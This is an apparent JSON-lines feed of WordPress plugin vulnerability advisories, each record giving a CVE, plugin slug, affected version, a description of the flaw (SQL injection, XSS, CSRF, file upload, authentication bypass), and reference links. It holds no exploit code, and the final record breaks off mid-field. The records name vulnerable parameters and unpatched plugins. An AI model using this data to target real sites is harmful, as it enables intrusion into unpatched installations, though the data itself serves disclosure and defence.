{"CVE_ID":"CVE-2023-2484","slug":"ldap-login-for-intranet-sites","versionImpact":"4.1.4","description":"The Active Directory Integration plugin for WordPress is vulnerable to time-based SQL Injection via the orderby and order parameters in versions up to, and including, 4.1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers with administrator privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ldap-login-for-intranet-sites\\\/trunk\\\/class-mo-ldap-user-auth-reports.php?rev=2859403#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ldap-login-for-intranet-sites\\\/trunk\\\/class-mo-ldap-user-auth-reports.php?rev=2859403#L64\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910898%40ldap-login-for-intranet-sites%2Ftrunk&old=2903294%40ldap-login-for-intranet-sites%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910898%40ldap-login-for-intranet-sites%2Ftrunk&old=2903294%40ldap-login-for-intranet-sites%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3eedc57b-79cc-4569-b6d6-676a22aa1e06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3eedc57b-79cc-4569-b6d6-676a22aa1e06?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4716","slug":"media-library-assistant","versionImpact":"3.10","description":"The Media Library Assistant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'mla_gallery' shortcode in versions up to, and including, 3.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1531\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1531\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5f6ae5d-7854-44c7-9fb8-efaa6e850d59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5f6ae5d-7854-44c7-9fb8-efaa6e850d59?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1511\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1511\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1515\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1515\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1507\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-support.php?rev=2955933#L1507\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2963256\\\/media-library-assistant\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2963256\\\/media-library-assistant\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1912","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxUpdateFolderPosition function. This makes it possible for unauthenticated attackers to update the folder position of categories as well as update the metadata of other taxonomies via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ca28c91-f75e-4691-91cf-459cc9da5ad8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ca28c91-f75e-4691-91cf-459cc9da5ad8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1497","slug":"themeisle-companion","versionImpact":"2.10.30","description":"The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form widget addr2_width attribute in all versions up to, and including, 2.10.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4603b58-0972-4e04-91ac-ffc846964722?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4603b58-0972-4e04-91ac-ffc846964722?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.30\\\/vendor\\\/codeinwp\\\/themeisle-content-forms\\\/includes\\\/widgets-admin\\\/elementor\\\/elementor_widget_base.php#L1219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themeisle-companion\\\/tags\\\/2.10.30\\\/vendor\\\/codeinwp\\\/themeisle-content-forms\\\/includes\\\/widgets-admin\\\/elementor\\\/elementor_widget_base.php#L1219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2019","slug":"wp-db-table-editor","versionImpact":"1.8.4","description":"The WP-DB-Table-Editor plugin for WordPress is vulnerable to unauthorized access of data, modification of data, and loss of data due to lack of a default capability requirement on the 'dbte_render' function in all versions up to, and including, 1.8.4. This makes it possible for authenticated attackers, with contributor access and above, to modify database tables that the theme has been configured to use the plugin to edit.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d044e0a-a956-4319-985d-6a9a276daf49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d044e0a-a956-4319-985d-6a9a276daf49?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-db-table-editor\\\/trunk\\\/db-table-editor.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-db-table-editor\\\/trunk\\\/db-table-editor.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6588","slug":"powerpress","versionImpact":"11.9.10","description":"The PowerPress Podcasting plugin by Blubrry plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018media_url\u2019 parameter in all versions up to, and including, 11.9.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/745262f6-4f73-453e-b650-15115536f221?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/745262f6-4f73-453e-b650-15115536f221?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/trunk\\\/powerpress-player.php#L1015\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/trunk\\\/powerpress-player.php#L1015\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/powerpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/powerpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115881\\\/#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115881\\\/#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7380","slug":"cf-geoplugin","versionImpact":"8.6.9","description":"The Geo Controller plugin for WordPress is vulnerable to unauthorized menu creation\/deletion due to missing capability checks on the ajax__geolocate_menu and ajax__geolocate_remove_menu functions in all versions up to, and including, 8.6.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create or delete WordPress menus.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/280e1b4d-08be-4e77-abcb-5f9079111595?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/280e1b4d-08be-4e77-abcb-5f9079111595?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf-geoplugin\\\/tags\\\/8.6.9\\\/inc\\\/classes\\\/Menus.php#L519\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf-geoplugin\\\/tags\\\/8.6.9\\\/inc\\\/classes\\\/Menus.php#L519\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf-geoplugin\\\/tags\\\/8.6.9\\\/inc\\\/classes\\\/Menus.php#L606\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf-geoplugin\\\/tags\\\/8.6.9\\\/inc\\\/classes\\\/Menus.php#L606\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10586","slug":"debug-tool","versionImpact":"2.2","description":"The Debug Tool plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check on the dbt_pull_image() function and missing file type validation in all versions up to, and including, 2.2. This makes it possible for unauthenticated attackers to to create arbitrary files such as .php files that can be leveraged for remote code execution.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e9d5c93-dcd7-450e-8c52-5c95fc5473d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e9d5c93-dcd7-450e-8c52-5c95fc5473d2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-tool\\\/trunk\\\/tools\\\/image-puller.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/debug-tool\\\/trunk\\\/tools\\\/image-puller.php#L120\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12461","slug":"wp-revive-adserver","versionImpact":"2.2.1","description":"The WP-Revive Adserver plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wprevive_async' shortcode in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-revive-adserver\\\/trunk\\\/src\\\/Inc\\\/WPReviveShortcodes.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-revive-adserver\\\/trunk\\\/src\\\/Inc\\\/WPReviveShortcodes.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-revive-adserver\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-revive-adserver\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/649545c8-e6a2-4587-a439-17081f389d46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/649545c8-e6a2-4587-a439-17081f389d46?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10815","slug":"postlists","versionImpact":"2.0.2","description":"The PostLists WordPress plugin through 2.0.2 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/309a445a-6261-4bd1-bac0-a78096d0c12b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/309a445a-6261-4bd1-bac0-a78096d0c12b\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/309a445a-6261-4bd1-bac0-a78096d0c12b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/309a445a-6261-4bd1-bac0-a78096d0c12b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8425","slug":"woocommerce-ultimate-gift-card","versionImpact":"2.6.0","description":"The WooCommerce Ultimate Gift Card plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'mwb_wgm_preview_mail' and 'mwb_wgm_woocommerce_add_cart_item_data' functions in all versions up to, and including, 2.6.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-ultimate-gift-card\\\/19191057\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-ultimate-gift-card\\\/19191057\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ebffb82-7455-40c9-9ffd-b78e0e73e431?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ebffb82-7455-40c9-9ffd-b78e0e73e431?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31035","slug":"wp-editormd","versionImpact":"10.2.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Benjamin Chris WP Editor.md &#8211; The Perfect WordPress Markdown Editor allows Stored XSS. This issue affects WP Editor.md &#8211; The Perfect WordPress Markdown Editor: from n\/a through 10.2.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-editormd\\\/vulnerability\\\/wordpress-wp-editor-md-the-perfect-wordpress-markdown-editor-10-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-editormd\\\/vulnerability\\\/wordpress-wp-editor-md-the-perfect-wordpress-markdown-editor-10-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4610","slug":"wp-members","versionImpact":"3.5.2","description":"The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpmem_user_memberships shortcode in all versions up to, and including, 3.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.2\\\/includes\\\/class-wp-members-products.php#L115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.2\\\/includes\\\/class-wp-members-products.php#L115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.2\\\/includes\\\/class-wp-members-products.php#L660\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-members\\\/tags\\\/3.5.2\\\/includes\\\/class-wp-members-products.php#L660\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwp-members&old=3240295&new_path=%2Fwp-members&new=3293207&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwp-members&old=3240295&new_path=%2Fwp-members&new=3293207&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-members\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-members\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ff96d74-8f20-49a6-bd02-0bfe3498b599?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ff96d74-8f20-49a6-bd02-0bfe3498b599?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5289","slug":"interactive-3d-flipbook-powered-physics-engine","versionImpact":"1.16.15","description":"The 3D FlipBook \u2013 PDF Embedder, PDF Flipbook Viewer, Flipbook Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018style\u2019 and 'mode' parameters in all versions up to, and including, 1.16.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note: This issue affects only block-based themes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/interactive-3d-flipbook-powered-physics-engine\\\/trunk\\\/inc\\\/shortcode.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/interactive-3d-flipbook-powered-physics-engine\\\/trunk\\\/inc\\\/shortcode.php#L130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/interactive-3d-flipbook-powered-physics-engine\\\/trunk\\\/inc\\\/shortcode.php#L134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/interactive-3d-flipbook-powered-physics-engine\\\/trunk\\\/inc\\\/shortcode.php#L134\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3315198\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3315198\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/interactive-3d-flipbook-powered-physics-engine\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/interactive-3d-flipbook-powered-physics-engine\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72b76475-5215-47fd-badf-e2c542b25d4b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72b76475-5215-47fd-badf-e2c542b25d4b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7692","slug":"orion-login-with-sms","versionImpact":"1.0.5","description":"The Orion Login with SMS plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.0.5. This is due to the olws_handle_verify_phone() function not utilizing a strong enough OTP value, exposing the hash needed to generate the OTP value, and no restrictions on the number of attempts to submit the code. This makes it possible for unauthenticated attackers to log in as other users, including administrators, if they have access to their phone number.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/orion-login-with-sms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/orion-login-with-sms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31a47cbd-c19b-4ac3-87ed-2d4c5c0e9cb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31a47cbd-c19b-4ac3-87ed-2d4c5c0e9cb7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1431","slug":"wordpress-simple-paypal-shopping-cart","versionImpact":"4.6.3","description":"The WP Simple Shopping Cart plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.6.3 due to the plugin saving shopping cart data exports in a publicly accessible location (\/wp-content\/plugins\/wordpress-simple-paypal-shopping-cart\/includes\/admin\/). This makes it possible for unauthenticated attackers to view information that should be limited to administrators only and can include data like first name, last name, email, address, IP Address, and more.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea4453bc-557b-4abf-85c6-4aecfd8f4012?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea4453bc-557b-4abf-85c6-4aecfd8f4012?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2878855%40wordpress-simple-paypal-shopping-cart&new=2878855%40wordpress-simple-paypal-shopping-cart&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2878855%40wordpress-simple-paypal-shopping-cart&new=2878855%40wordpress-simple-paypal-shopping-cart&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2452","slug":"advanced-woo-search","versionImpact":"2.77","description":"The  Advanced Woo Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 2.77 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.77\\\/includes\\\/admin\\\/class-aws-admin-options.php#L473\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.77\\\/includes\\\/admin\\\/class-aws-admin-options.php#L473\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4278e9d7-aa1e-47a5-b715-09dae5156303?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4278e9d7-aa1e-47a5-b715-09dae5156303?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.77\\\/includes\\\/admin\\\/class-aws-admin-options.php#L481\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-woo-search\\\/tags\\\/2.77\\\/includes\\\/admin\\\/class-aws-admin-options.php#L481\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1910","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxClearCategory function. This makes it possible for unauthenticated attackers to clear categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1c2712d-0865-4759-98da-1e11a26f2466?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1c2712d-0865-4759-98da-1e11a26f2466?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1489","slug":"sms-alert","versionImpact":"3.6.9","description":"The SMS Alert Order Notifications \u2013 WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.9. This is due to missing or incorrect nonce validation on the processBulkAction function. This makes it possible for unauthenticated attackers to delete pages and posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7a28382-facb-43a7-892a-8ca9e7f0f62b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7a28382-facb-43a7-892a-8ca9e7f0f62b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3039989%40sms-alert%2Ftrunk&old=3032487%40sms-alert%2Ftrunk&sfp_email=&sfph_mail=#file19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3039989%40sms-alert%2Ftrunk&old=3032487%40sms-alert%2Ftrunk&sfp_email=&sfph_mail=#file19\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1718","slug":"woocommerce-checkout-cielo","versionImpact":"1.1.0","description":"The Claudio Sanches \u2013 Checkout Cielo for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to insufficient payment validation in the update_order_status() function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to update the status of orders to paid bypassing payment.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 